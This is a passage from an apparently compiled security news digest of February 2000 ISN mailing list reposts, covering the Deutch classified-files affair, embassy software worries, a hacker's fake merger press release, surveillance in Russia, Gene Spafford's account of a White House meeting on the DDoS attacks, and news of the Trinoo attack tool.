      didn't want the bad publicity so they went along with the charade."
      
      The "crime report" sent to Justice from the CIA inspector general in
      1998 also referred to a possible espionage-related offense that the
      official said was a "red herring" meant to distract attention from
      other serious crimes.
      
      Investigators planned to notify the Justice Department about "three
      crimes we knew were sure-fire violations with clear evidence, but the
      chiefs said 'no,' " the official said.
      
      The three violations included:
      
      * A law that provides for up to one year in prison for unauthorized
      removal or retention of classified documents.
      
      * A law that provides for up to three years in prison for concealing
      or attempting to destroy or remove government documents.
      
      * A law making it illegal to work on personal projects where a
      financial interest is involved.
      
      Security officials said the Government Ethics Office was never
      notified about one of the possible crimes related to Mr. Deutch's
      no-fee contract he arranged after leaving the CIA in December 1996.
      
      A spokesman for the Ethics Office said it was never informed about the
      possible conflict of interest.
      
      The CIA official said Mr. Deutch's CIA contract may have been illegal
      because the only reason for it was for Mr. Deutch to avoid having to
      buy his own computers.
      
      The official said the contract also appeared to be part of an effort
      by Mr. Deutch to avoid having to return the home computers to the CIA
      because he was fearful the improperly stored documents would be
      discovered.
      
      The CIA official also faulted current CIA Director George Tenet for
      failing to report the crimes to the Justice Department. The law
      required the CIA director to "expeditiously report" information about
      violations of Title 18 to the Justice Department.
      
      
      ---------------------------------------------------
      "Communications without intelligence is noise;
      Intelligence without communications is irrelevant."
      Gen. Alfred. M. Gray, USMC
      ---------------------------------------------------
      C4I Secure Solutions             http://www.c4i.org
      *=================================================*
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA            
      
168.0 ISN:US Embassy's software originated back in the USSR
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      http://www.telegraph.co.uk:80/et?ac=000114832908976&rtmo=02xKsKGq&atmo=ggggg3JK&pg=/et/00/2/17/wspy17.html
      
      (The Daily Telegraph) [2.17.00] The State Department faced its second
      major security embarrassment in three months after admitting that it
      had sent its embassies a piece of software written by citizens of the
      former Soviet Union.
      
      In December, the department conceded that it had found a sophisticated
      listening device implanted in the walls of a conference room on what
      is supposed to be the most secure part of the building. A Russian
      diplomat was arrested and expelled after he was observed by the FBI
      monitoring the device from outside.
      
      The new security lapse occurred on Feb 2 when all American missions
      and embassies around the world were sent an urgent cable telling them
      to remove a piece of software from their mainframe computers.
      
      The programme had been written by a company called Synergy
      International Systems, which is based in Vienna, Virginia, but is
      owned by Armenians. The company, whose website says it also has
      offices in Moscow and Guatemala, says there is no security problem and
      that they are confident an internal review by the FBI will clear them
      of any suspicion.
      
      So far, investigators have not found any evidence of malpractice. The
      main fears are that the software could contain a hidden code that
      could download sensitive information from embassy computers or install
      bugs that could cause crashes in the system at critical moments.
      
      Bonnie Cohen, a senior administrator at the State Department, was
      quoted in the Washington Post yesterday as saying: "On the face of it,
      from what we know so far, it's an extraordinary lapse of judgment."
      
      The latest security scare follows the admission by the CIA that John
      Deutch, a former director, took top secret files home and installed
      them on his own computer, which he also used to look at the internet.
      
      
      
      ---------------------------------------------------
      "Communications without intelligence is noise;
      Intelligence without communications is irrelevant."
      Gen. Alfred. M. Gray, USMC
      ---------------------------------------------------
      C4I Secure Solutions             http://www.c4i.org
      *=================================================*
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA            
      
169.0 ISN:Hacker posts phony press release
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      http://www.marketwatch.newsalert.com/bin/story?StoryId=CokUaubebDxmTAgfJA2vK&FQ=v%25upi&Title=Headlines%20for%3A%20v%25upi%20
      
      ANN ARBOR, Mich., Feb. 17 (UPI) [2.17.00] - Aastrom Biosciences Inc.
      Thursday initiated an investigation after a computer hacker posted a
      fake press release on its Web site announcing a merger with Geron
      Inc., a California biopharmaceutical company.
      
      Aastrom officials said they think the hacker was trying to manipulate
      the stock of both companies. Aastrom fell to 4 9/16 in early trading
      while Geron rose $9 to 56 .
      
      Aastrom President and CEO R. Douglas Armstrong said there was nothing
      to the merger announcement.
      
      "We are appalled by this ruthless attempt to manipulate markets and
      potentially harm the shareholders of both companies," Armstrong said.
      
      He apologized to shareholders and said the company was investigating
      security on its Web site.
      
      Geron said it was not conducting any merger talks with Aastrom.
      
      Aastrom officials discovered the fake press release on the web site
      Thursday morning and contacted Nasdaq and law enforcement authorities.
      
      The Ann Arbor, Mich., firm is developing technology to help replace
      cells damaged by cancer chemotherapy and holds patents on ways to grow
      human stem cells.
      
      Aastrom traded for as little as 31 cents a share in October but is
      considered a mover after reaching a 52-week high of $6.44 on Monday.
      
      Geron, of Menlo Park, Calif., is involved in research on aging, cancer
      and other age-related chronic diseases.
      
      
      ---------------------------------------------------
      "Communications without intelligence is noise;
      Intelligence without communications is irrelevant."
      Gen. Alfred. M. Gray, USMC
      ---------------------------------------------------
      C4I Secure Solutions             http://www.c4i.org
      *=================================================*
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA            
      
170.0 ISN:Hacker, Media Hype and, Disinformation
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      http://cryptome.org/madsen-hmhd.htm
      
      17 February 2000. Thanks to Wayne Madsen <WMadsen777@aol.com>
      
      HACKERS, MEDIA HYPE, AND DISINFORMATION
      
      WAYNE MADSEN
      
      For what it is worth, I am a 20-year veteran of the computer security
      community. I have served in the Navy, National Security Agency, State
      Department, Computer Sciences Corporation, RCA, and have consulted on
      computer security with the National Institute of Standards and
      Technology, international banks, telecom companies and even firms that
      manufacture candy.
      
      While working for the FBI and Naval Investigative Service, I put one
      US Navy official in Federal prison for espionage and other crimes, and
      I was involved in U.S. counter-terrorism work in Greece and the
      Philippines. I think I know how the "spook" community operates and,
      more importantly, how it thinks.
      
      The hype associated with the recent Internet flooding is outrageous
      and serves the agendas of the military and intelligence communities
      regarding new vistas for bloated Pentagon and espionage budgets.
      
      On 17 February, National Public Radio's Diane Rehm Show had a round
      table discussion featuring James Adams, a former London Sunday Times
      reporter in Washington who is now a drum beater for information
      warfare, and Jeffrey Hunker, the former head of the White House
      Critical Infrastructure Assurance Office. Adams suggested that for
      critical infrastructure protection certain civil liberties must be
      forfeited. He also stated that Internet transactions should not be
      afforded the same degree of privacy as the U.S. mail.
      
      Hunker was uncomfortable that some people think that scare mongering
      has been at the center of the recent packet flooding of the Internet.
      Adams supported the CIA's creation of IN-Q-IT, a CIA Trojan Horse in
      the Silicon Valley. According to Adams, Science Applications
      International Corporation (SAIC), a virtual CIA proprietary firm, is
      funding, through IN-Q-IT, a program called Net Eraser. None of the
      participants in the Rehm Show were willing to talk about Net Eraser
      and some seemed very nervous about discussing it in detail.
      
      This radio program is highly indicative of the current hype
      surrounding the Distributed Denial of Service (DDOS) attacks on DOT
      COM sites on the Internet. Even the use of the acronym DDOS is
      amazing. Here they are, twenty-something DOT COM executives, who
      probably never thought about computer security except for watching
      re-runs of "Hackers" and "Sneakers," using Pentagon-originated terms
      like "Distributed Denial of Service" attacks.
      
      Why? Who told them to use those terms?
      
      Then Clinton manages to take 90 minutes to attend an Internet security
      summit on February 15. Northern Ireland's peace agreement is falling
      apart, the Israeli-Palestine agreement is unraveling, and Russia's new
      President is putting ex-KGB agents in his government, but Clinton has
      enough time to talk with a group of e-commerce barons, computer
      security geeks, and even one hacker. The whole thing appeared to be
      staged and scheduled way in advance.
      
      The whole so-called Internet "hack" smells of a perception management
      campaign by the intelligence community. Perhaps the system flooding
      was coordinated by one group -- however, those types of attacks
      probably occur on a daily basis without being reported by the world's
      media. It is important to note that one of the key components of
      information warfare -- according to the Pentagon's own seminal
      documents -- is perception management -- psychological operations to
      whip up public support for a policy or program. The early Defense
      Science Board reports on Critical Infrastructure Protection actually
      call for a campaign to change the public's attitude about information
      system and network security.
      
      The Pentagon is a master at deception campaigns aimed at the news
      media. They constantly broadcast disinformation to television and
      radio audiences in Haiti, Serbia, Colombia, Mexico and elsewhere. They
      are now extending this to cyber space. Critical infrastructure
      protection is a masterful ruse aimed at creating the myth of impeding
      cyber-peril.
      
      The major domo is a weird chap named Richard Clarke, a Dr.
      Strangelove-type character who is Clinton's counter-terrorism czar. He
      always talks about defensive cyber-warfare but clams up when it comes
      to offensive US cyber-operations. That is classified.
      
      However, it is certain that the US Government has already done more to
      disrupt the Internet than any other actor -- state-sponsored or
      freelance. For the past few years, US government hackers have
      penetrated networks at the European Parliament, Australian Stock
      Exchange, and banks in Athens, Nicosia, Moscow, Johannesburg, Beirut,
      Tel Aviv, Zurich, and Vaduz. The US also engaged in network
      penetrations in Yugoslavia during the NATO war against that country.
      
      Why doesn't NPR, CBS, ABC, NBC and the others focus on what the US is
      doing to disrupt the Internet? They are instead falling into a
      familiar Pentagon trap of deception and diversion.
      
      
      ---------------------------------------------------
      "Communications without intelligence is noise;
      Intelligence without communications is irrelevant."
      Gen. Alfred. M. Gray, USMC
      ---------------------------------------------------
      C4I Secure Solutions             http://www.c4i.org
      *=================================================*
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA            
      
171.0 ISN:US Secret agents work at Microsoft
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      http://www.theage.com.au/breaking/0002/19/A27800-2000Feb19.shtml
      
      Source: AFP | Published: Saturday February 19, 7:44 AM
      
      PARIS, Feb 18 - A French intelligence report today accused US secret
      agents of working with computer giant Microsoft to develop software
      allowing Washington to spy on communications around the world.
      
      The report, drawn up by the Strategic Affairs Delegation (DAS), the
      intelligence arm of the French Defence Ministry, was quoted in today's
      edition of the news-letter Le Monde du Renseignement (Intelligence
      World).
      
      Written by a senior officer at the DAS, the report claims agents from
      the National Security Agency (NSA) helped install secret programmes on
      Microsoft software, currently in use in 90 per cent of computers.
      
      According to the report there was a 'strong suspicion' of a lack of
      security fed by insistent rumours about the existence of spy programs
      on Microsoft, and by the presence of NSA personnel in Bill Gates'
      development teams.
      
      The NSA protects communications for the US government, and also
      intercepts electronic messages for the Defence Department and other US
      intelligence agencies, the newsletter said.
      
      According to the report, 'it would seem that the creation of Microsoft
      was largely supported, not least financially, by the NSA, and that IBM
      was made to accept the (Microsoft) MS-DOS operating system by the same
      administration.'
      
      The report claimed the Pentagon was Microsoft's biggest client in the
      world.
      
      
      @HWA            
      
                        
172.0 ISN:Greek hackers attack U.S military installation?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      Hello,
      
      FYI, the Greek newspaper TA NEA has a story today about hacking attempts
      from three Greek Universities against an Arizona DoD installation. The
      article says that the US  government asked the Greek one to find those
      responsible and have them being interrogated by US agents. It seems, the
      hackers managed to eventually crack the systems' security.
      
      No more news is available yet, but this must be the first time that
      something like that is said to be done through Greek servers. If there is
      any other info...
      
      T.B
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA                              
      
173.0 ISN:KGB successor paid to infiltrate internet
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      http://www.techserver.com/noframes/story/0,2294,500171461-500220807-501048365-0,00.html
      
      By SERGEI SHARGORODSKY
      
      MOSCOW (February 21, 2000 9:07 p.m. EST http://www.nandotimes.com) -
      The KGB's successor is now also spying on the Internet, raising fears
      that the information it collects could be used for blackmail and
      business espionage.
      
      "The whole Federal Security Service will be crying tomorrow over your
      love letters," warns one of the banners angry Russian Web designers
      have posted on the Internet.
      
      Russian human-rights and free-speech advocates say the security
      service has already forced many of the country's 350 Internet service
      providers to install surveillance equipment.
      
      "Most Internet providers in Moscow, including all the large providers
      and many in the provinces, have opened a hole" for security agents to
      peep at traffic, said Anatoly Levenchuk, a Russian Internet expert.
      
      Like its counterparts in other countries, the Federal Security Service
      may argue it needs the monitoring system to catch spies, terrorists
      and bandits, and to combat black-market businesses and capital flight.
      
      But the system has raised particular alarm in Russia, where memories
      of KGB surveillance and repression remain fresh. And the abundance of
      secretly filmed, juicy videotapes and transcripts of telephone
      conversations in Russia seems to justify the fear of blackmail by
      renegade security agents or others who get hold of the information.
      
      Free-speech activists fear that the Internet surveillance is evidence
      of the security services' resurgence under acting President Vladimir
      Putin, a 15-year KGB veteran. They have already accused him of
      chipping away at press freedoms championed by former President Boris
      Yeltsin.
      
      Last week, a government official for the first time publicly
      acknowledged the existence of the Internet control project, called the
      System of Operative and Investigative Procedures or SORM-2, its
      Russian acronym.
      
      Alexei Rokotyan, the Communications Ministry's electronic
      communications department chief, denied that the project was aimed at
      "total control of the information that is transmitted via the global
      network."
      
      "Security organs and special forces have the right - and now the
      capability - to monitor private correspondence and telephone
      conversations of individual citizens according to the law," The Moscow
      Times daily quoted him as saying.
      
      Levenchuk and others said the Federal Security Service has been
      quietly implementing the system at least since 1998.
      
      "As you look at all these Orwellian things you understand it's coming
      - total control, total surveillance," Levenchuk told a round table
      held in St. Petersburg.
      
      Federal Security Service officials apparently view the steps simply as
      an extension of SORM regulations enacted in the mid-1990s, which allow
      security agents with a warrant to tap telephones and Internet traffic.
      
      At a series of meetings with Internet providers in 1998, security
      service officials described a system that would involve a box
      installed in providers' computers that would route electronic traffic
      to the local security service headquarters through a high-speed link.
      
      The project still seems a far cry from Echelon, a high-tech spying
      network which, according to a European Parliament report, is
      coordinated by the U.S. National Security Agency and involves "routine
      and indiscriminate" monitoring of electronic communications around the
      world.
      
      But Russia's Internet freedom activists are still raising the alarm.
      Levenchuk's www.libertarium.ru site is filled with accounts from
      mostly provincial providers that say they were forced to install
      SORM-2 equipment.
      
      One provider in southern Volgograd, Bayard-Slavia Communications,
      actually refused when security service agents sought to "receive full
      and uncontrolled access to all our clients and their communications,"
      its chief Nail Murzakhanov said.
      
      Bayard-Slavia had its main communication line cut off and faced
      threats of fines from government officials. But it won a court case
      against the security service last fall.
      
      Human rights advocates said Murzakhanov's confrontation with the
      Federal Security Service was enough to persuade many a reluctant
      provider.
      
      But Anton Nosik, who edits the Vesti.Ru and Lenta.Ru electronic
      newspapers, said the case was rare and that he was not aware of any
      major providers complying with the SORM-2 directives.
      
      Nosik was less concerned than others, saying security service agents
      already have access to electronic traffic and would not be able to
      monitor its ever-increasing volumes in full.
      
      "Yet there is an unpleasant trend of security services trying to
      implement non-constitutional norms," he said. "This should not be
      allowed."
      
      
      ---------------------------------------------------
      "Communications without intelligence is noise;
      Intelligence without communications is irrelevant."
      Gen. Alfred. M. Gray, USMC
      ---------------------------------------------------
      C4I Secure Solutions             http://www.c4i.org
      *=================================================*
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA            
      
174.0 ISN:REVIEW: Security Technologies for the World Wide Web
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list

      From: "Rob Slade, doting grandpa of Ryan and Trevor" <rslade@sprint.ca>
      
      BKSCTCWW.RVW   20000113
      
      "Security Technologies for the World Wide Web", Rolf Oppliger, 2000,
      1-58053-045-1
      %A   Rolf Oppliger rolf.oppliger@acm.org,oppliger@computer.org
      %C   685 Canton St., Norwood, MA   02062
      %D   2000
      %G   1-58053-045-1
      %I   Artech House/Horizon
      %O   800-225-9977 fax: 617-769-6334 artech@artech-house.com
      %P   419 p.
      %T   "Security Technologies for the World Wide Web"
      
      In the preface, the author states that the book is first intended for
      Webmasters, who need practical configuration information, then for users
      who have security concerns, and finally for Web and electronic commerce
      developers.  He also says that the book can be used as an introduction,
      for self-study, as a course text, and as a reference.  A pretty tall
      order, but, by and large, Oppliger does a reasonable job of fulfilling the
      entire mandate.
      
      Chapter one, as an introduction, is possibly more than most people want to
      know.  However, the extra information (such as the explanation of HTTP
      [HyperText Transfer Protocol] requests and responses) does help provide an
      understanding of the underlying actions and concepts which are needed for
      a thorough view of security operations and requirements.  There is a
      detailed presentation of HTTP access control methods in chapter two.  The
      introduction to firewalls, in chapter three, is complete and helpful, with
      a wealth of user level information that is all too often omitted.  Chapter
      four is a solid introduction to the basics of cryptography.  Channel
      security at the data link, transfer, and application layers is the theme
      of chapter five, touching on tunneling, VPNs (Virtual Private Networks),
      IPsec, and various application protocols.  Chapter six expands two of
      these with details on the Secure Sockets Layer (SSL) and Transport Layer
      Security (TLS).
      
      Chapter seven gives an overview of electronic payment systems, with brief
      descriptions of the most common electronic cash, debit, and credit
      schemes.  The management of certificates, in chapter eight, mostly covers
      ongoing work in key infrastructure, with a good discussion of the
      important and difficult question of certificate revocation.  A fair and
      realistic review of active content is provided in chapter nine.  For
      slightly less active content, chapter ten discusses and shows examples of
      more secure practices for CGI (Common Gateway Interface) and API
      (Application Programming Interface) work. Mobile code and agents are still
      really future technology, and so are the proposed security functions in
      Chapter eleven.  The copyright discussion in chapter twelve is a little
      disappointing, since it seems primarily concerned with watermarking.
      Chapter thirteen looks at privacy, being dealt with by amateurs as usual,
      and, as usual, providing glimpses of fascinating work that is not widely
      known. There is a brief overview of censorship systems and problems in
      chapter fourteen.  Chapter fifteen concludes with a somewhat pessimistic
      review of the situation.
      
      The bibliographies at the end of every chapter contain solid works, and
      can be useful to those wanting further information.  They do, however,
      have a very definite academic flavour, in that most of the entries are
      articles or conference presentations, with books and online references
      making up a smaller portion of the whole.
      
      Oppliger's writing is rather dry and academic in tone, but the material
      presented is realistic, useful, and conceptually complete.  Despite the
      disparate audience range, the author has managed to provide something of
      value for all.  For the Web workers who are the primary audience, this
      book provides, if not a cookbook for security, a complete picture of the
      various aspects that must be addressed.
      
      copyright Robert M. Slade, 2000 BKSCTCWW.RVW 20000113
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA      
      
175.0 ISN:Infosecurity at the White House
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      [Note: you may post this account or forward it to mailing lists, provided
      you pass the account and this notice in its entirety.]
      
      Infosecurity at the White House
      Gene Spafford
      
      Prolog
      
      Last week (ca. 2/8/00), a massive distributed denial of service attack was
      committed against a number of Internet businesses, including e-Bay, Yahoo,
      Amazon.com, and others. This was accomplished by breaking into hundreds
      (thousands?) of poorly-secured machines around the net and installing packet
      generation "slave" programs. These programs respond by remote control to
      send packets of various types to target hosts on the network. The resulting
      flood effectively shut those target systems out of normal operation for
      periods ranging up to several hours.
      
      The press jumped all over this as if it was something terribly new (it isn't
      -- experienced security researchers have known about this kind of problem
      for many years) and awful (it can be, but wasn't as bad as they make it out
      to be). One estimate in one news source speculated that over a billion
      dollars had been lost in lost revenue, downtime, and preventative measures.
      I'm skeptical of that, but it certainly is the case that a significant loss
      occurred.
      
      Friday, Feb 11, I got a call from someone I know at OSTP (Office of Science
      and Technology Policy) inquiring if I would be available to meet with the
      President as part of a special meeting on Internet security. I said "yes." I
      was not provided with a list of attendees or an agenda. Initially, I was
      told it would be a meeting of security experts, major company CEOs, and some
      members of the Security Council, but that was subject to change.
      
      The Meeting
      
      I arrived at the Old Executive Office Building prior to the meeting to talk
      with some staff from OSTP. These are the people who have been working on the
      Critical Infrastructure issues for some time, along with some in the
      National Security Council. They really "get it" about the complexity of the
      problem, and about academia's role and needs, and this may be one reason why
      this was the first Presidential-level meeting on information security that
      included academic faculty.
      
      After a few minutes, I was ushered into Dr. Neal Lane's office where we
      spent about 15 minutes talking. (As a scientist and polymath, I think Lane
      has one of the more fascinating jobs in the Executive Branch: that of
      Assistant to the President for Science and Technology and Director of OSTP .
      For instance, on his table he had some great photos of the Eros asteroid
      that had been taken the day before.) We then decided to walk over to the
      White House (next door) where we joined the other attendees who were waiting
      in a lobby area.
      
      Eventually, we were all escorted upstairs to the Cabinet Room. It was a
      tight fit, as there were over 30 of us, staff and guests (invitee list at
      the end). We then spent a half hour mingling and chatting. There were a lot
      of people I didn't know, but that's because normally I don't get to talk to
      CEOs. Most notably, there were people present from several CERIAS sponsor
      organizations (AT&T, Veridian/Trident, Microsoft, Sun, HP, Intel, Cisco). I
      also (finally!) got to meet Prof. David Farber in person. We've "known" each
      other electronically for a long time, but this was our first in-person
      meeting.
      
      After a while, some more of the government folk joined the group: Attorney
      General Reno; Commerce Secretary Daley; Richard Clarke, the National
      Coordinator for Security, Infrastructure Protection and Counter-terrorism;
      and others. After some more mingling, I deduced the President was about to
      arrive -- several Secret Service agents walked through the room giving
      everyone a once-over. Then, without any announcement or fanfare, the
      President came into the room along with John Podesta, his chief of staff.
      
      President Clinton worked his way around the room, shaking everyone's hand
      and saying "hello." He has a firm handshake. In person, he looks thinner
      than I expected, and is not quite as tall as I expected, either.
      
      We all then sat down at assigned places. I had the chair directly opposite
      the President. Normally, it is the chair of the Secretary of State. To my
      left was Whit Diffie of Sun, and to my right was John Podesta. I was
      actually surprised that I had a seat at the table instead of in the
      "overflow" seats around the room.
      
      The press was then let into the room. It was quite a mass. The President
      made a statement, as did Peter Solvik of Cisco. The press then asked several
      questions (including one about oil prices that had nothing to do with the
      meeting). Then, they were ushered out and the meeting began.
      
      The President asked a few individuals (Podesta, Daley, Reno, Pethia, Noonan)
      to make statements on behalf of a particular segment of industry of
      government, and then opened it up for discussion. The next hour went by
      pretty quickly. Throughout, the President listened carefully, and seemed
      really involved in the discussion. He asked several follow-up questions to
      things, and steered the discussion back on course a few times. He followed
      the issues quite well, and asked some good follow-up questions.
      
      During the discussion, I made two short comments. The first was about how it
      was important that business and government get past using cost as the
      primary deciding factor in acquiring computer systems, because quality and
      safety were important. I went on to say that it was important to start
      holding managers and owners accountable when their systems failed because of
      well-known problems. I observed that if the government could set a good
      example in these regards, others might well follow.
      
      My second comment was on the fact that everyone was talking about "business
      and government" at the meeting but that there were other players, and that
      academia in particular could play an important part in this whole situation
      in cooperation with everyone else. After all, academia is where much of the
      research gets done, and where the next generation of leaders, researchers,
      and businesspeople are coming from!
      
      Overall, the bulk of the comments and interchange were reasoned and polite.
      I only remember two people making extreme comments (to which the rest of us
      gave polite silence or objections); I won't identify the people here, but
      neither were CERIAS sponsors :-). One person claimed that we were in a
      crisis and more restrictions should be placed on publishing vulnerability
      information, and the other was about how the government should fund
      "hackers" to do more offensive experimentation to help protect systems. My
      summary of the major comments and conclusions is included below.
      
      After considerable discussion, the meeting concluded with Dick Clarke
      reminding everyone that the President had submitted a budget to Congress
      with a number of new and continuing initiatives in information security and
      cybercrime investigation, and it would be up to Congress to provide the
      follow-through on these items.
      
      We then broke up the meeting, and the President spent a little more time
      shaking hands and talking with people present. Buddy (his dog) somehow got
      into the room and "met" several of us, too -- I got head-butt in the side of
      my leg as he went by. :-) The official photographer got a picture of the
      President shaking my hand again.
      
      The President commented to Vint Cerf how amazed he was that the group had
      been so well-behaved --- we listened to each other, no one made long
      rambling speeches, and there was very little posturing going on. Apparently,
      similar groups from other areas are quite noisy and contentious.
      
      We (the invitees) then went outside where there was a large crowd of the
      press. Several of us made short statements, and then broke up into groups
      for separate interviews. After that was done, I left and returned home to
      teach class on Wednesday.
      
      My interview with the local news station didn't make it on the 6pm news, and
      all the print accounts seemed make a big deal of the fact that "Mudge" was
      at the meeting. Oh well, I thought "Spaf" was a way-cool "handle", better
      than "Mudge" but it doesn't go over as well with the press for some reason.
      I'll have to find some other way to develop a following of groupies. :-)
      
      On Friday, I was back in DC at the White House conference center to
      participate in a working session with the PCAST (President's Committee of
      Advisors on Science & Technology) to discuss the structure and organization
      of the President's proposed Institute for Information Infrastructure
      Protection. This will have a projected budget of $50 million per year.
      CERIAS is already doing a significant part of what the IIIP is supposed to
      address (but at a smaller scale). Thus, we may have a role to play in that
      organization, as will (I hope) many of the other established infosec
      centers. The outcome of that meeting was that the participants are going to
      draft some "strawman" documents on the proposed IIIP organization for
      consideration. I am unsure whether this is significant progress or not.
      
      Outcomes
      
      I didn't enter the meeting with any particular expectations. However, I was
      pleasantly surprised at the sense of cooperation that permeated the meeting.
      I don't think we solved any problems, or even set an agenda of exactly what
      to do. There was a clear sense of resistance from the industry participants
      to any major changes in regulations or Internet structure. In fact, most of
      the companies represented did not send CEOs so that (allegedly) there would
      be no one there who could make a solid commitment for their firms should the
      President press for some action.
      
      Nonetheless, there were issues discussed, some subsets of those present did
      agree to meet and pursue particular courses of action, and we were reminded
      about the President's info protection plan. To be fair, this is an area that
      has been getting attention from the Executive Branch for several years, so
      this whole event shouldn't be seen as a sudden reaction to specific events.
      Rather, from the PCCIP on, there has been concern and awareness of the
      importance of these issues. This was simply good timing for the President to
      again demonstrate his concern, and remind people of the national plan that
      was recently released.
      
      I came away from the meeting with the feeling that a small, positive step
      had been made. Most importantly, the President had made it clear that
      information security is an area of national importance and that it is taken
      seriously by him and his administration. By having Dave Farber and myself
      there, he had also made a statement to the industry people present that his
      administration takes the academic community seriously in this area. (Whether
      many of the industry people got that message -- or care -- remains to be
      seen.)
      
      I recall that there were about 7 major points made that no one disputed:
      1) The Internet is international in scope, and most of the companies present
      have international operations. Thus, we must continue to think globally. US
      laws and policies won't be enough to address all our problems.
      2) Privacy is a big concern for individuals and companies alike. Security
      concerns should not result in new rules or mechanisms that result in
      significant losses of privacy.
      3) Good administration and security hygiene are critical. The problems of
      the previous week were caused by many sites (including, allegedly, some
      government sites) being compromised because they were not maintained and
      monitored. This, more than any perceived weakness in the Internet, led to
      the denial of service.
      4) There is a great deal of research that yet needs to be done.
      5) There are not enough trained personnel to deal with all our security
      needs.
      6) Government needs to set a good example for everyone else, by using good
      security, employing standard security tools, installing patches, and
      otherwise practicing good infosec.
      7) Rather than new structure or regulation, broadly-based cooperation and
      information sharing is the near-term approach best suited to solving these
      kinds of problems.
      
      Let's see what happens next. I hope there is good follow-though by some of
      the parties in attendance, both within and outside government.
      
      Miscellany
      
      Rich Pethia of CERT, Alan Paller of SANS, and I have drafted a short list of
      near-term actions that sites can implement to help prevent a recurrence of
      the DDOS problems. Alan is going to coordinate input from a number of
      industry people, and then we will publicize this widely. It isn't an agenda
      for research or long-term change, but we believe it can provide a concrete
      set of initial steps. This may serve as a good model for future such
      collaborative activities.
      
      I was asked by several people if I was nervous. Actually, no. I've been on
      national television many times, and I've spoken before crowds of nearly a
      thousand people. Actually, *he* should have been nervous -- I have tenure,
      and he clearly does not. :-)
      
      The model we have at CERIAS with the partnership of industry and academia is
      exactly what is needed right now. Our challenge is to find some ways to
      solve our faculty needs and space shortage. In every other way, we're
      ideally positioned to continue to make a big difference in the coming years.
      
      Of the 29 invited guests, there was only one woman and one member of a
      traditional minority. I wonder how many of the people in the room didn't
      even notice?
      
      Attendees
      
      Douglas F. Busch
      Vice President of Information Technology, Intel
      
      Clarence Chandran
      President, Service Provider & Carrier Group, Nortel Networks
      
      Vinton Cerf
      Senior Vice President, Internet & Architecture & Engineering, MCI Worldcom
      
      Christos Costakos
      Chief Executive Officer, E-Trade Group, Inc.
      
      Jim Dempsey
      Senior Staff Counsel, Center for Democracy and Technology
      
      Whitfield Diffie
      Corporate Information Officer, Sun Microsystems
      
      Nick Donofrio
      Senior Vice President and Group Executive, Technology & Manufacturing, IBM
      
      Dave Farber
      University of Pennsylvania
      
      Elliot Gerson
      Chief Executive Officer, Lifescape.com
      
      Adam Grosser
      President, Subscriber Networks, Excite@home
      
      Stephen Kent
      BBN Technologies (GTE)
      
      David Langstaff
      Chairman and Chief Executive Officer, Veridan
      
      Michael McConnell
      Booz-Allen
      
      Mary Jane McKeever
      Senior Vice President, World Markets, AT&T
      
      Roberto Medrano
      Senior Vice President, Hewlett Packard
      
      Harris N. Miller
      President, Information Technology Association of America (ITAA)
      
      Terry Milholland
      Chief Information Officer, EDS
      
      Tom Noonan
      Internet Security Systems (ISS)
      
      Ray Oglethorpe
      President, AOL Technologies, America Online
      
      Allan Paller
      Chairman, SANS Institute
      
      Rich Pethia
      CERT/CC, SEI at Carnegie-Mellon University
      
      Geoff Ralston
      Vice President for Engineering, Yahoo!
      
      Howard Schmidt
      Chief Information Security Officer, Microsoft
      
      Peter Solvik
      Chief Information Officer, Cisco Systems
      
      Gene Spafford
      CERIAS at Purdue University
      
      David Starr
      Chief Information Officer, 3Com
      
      Charles Wang
      Chief Executive Officer, Computer Associates International
      
      Maynard Webb
      President, Ebay
      
      Peiter Zatko a.k.a. "Mudge"
      @stake
      
      --
      COMPASS [for the CDC-6000 series] is the
      sort of assembler one expects from a corporation
      whose president codes in octal. -- J.N. Gray
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA            
      
176.0 ISN:New hacker software could spread by email
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list

      By John Borland
      Staff Writer, CNET News.com
      February 23, 2000, 4:35 a.m. PT
      URL: http://news.cnet.com/category/0-1005-200-1555637.html
      
      A group of anonymous programmers has released a new version of the
      software that may have helped shut down Yahoo and Amazon.com earlier
      this month--one that makes it far easier to launch attacks, computer
      experts say.
      
      The tools, a new version of a software package dubbed "Trinoo," could
      allow attackers to infiltrate ordinary desktop computers though an
      innocent-looking email attachment. These computers--particularly those
      connected to high-speed Internet services--could then be used as
      unwitting accomplices in assaults on other Web sites, security
      analysts say.
      
      "(The previous attacks) took someone who knew what they were doing,"
      Trend Micro spokesman David Perry said. "This turns it into a
      kid-on-the-street problem."
      
      The release of these tools follows some of the highest-profile
      computer attacks in the Web's history. Using a method dubbed
      "distributed denial of service attacks," computer vandals successfully
      rendered Yahoo, Amazon, eBay and a handful of other big Web sites
      paralyzed for hours at a time by swamping them with a multitude of
      simultaneous requests.
      
      The attacks have spurred law enforcement investigations around the
      globe, but the FBI has not reported any major breakthroughs in the
      case.
      
      Some speculation has centered on several individuals with hacker
      nicknames like "mafiaboy." Canadian authorities investigated an
      Internet service provider last week that once hosted a "mafiaboy"
      hacker-related site. But Canadian police said today that they had no
      progress to report in their investigation.
      
      Although no conclusive evidence has been released on exactly what
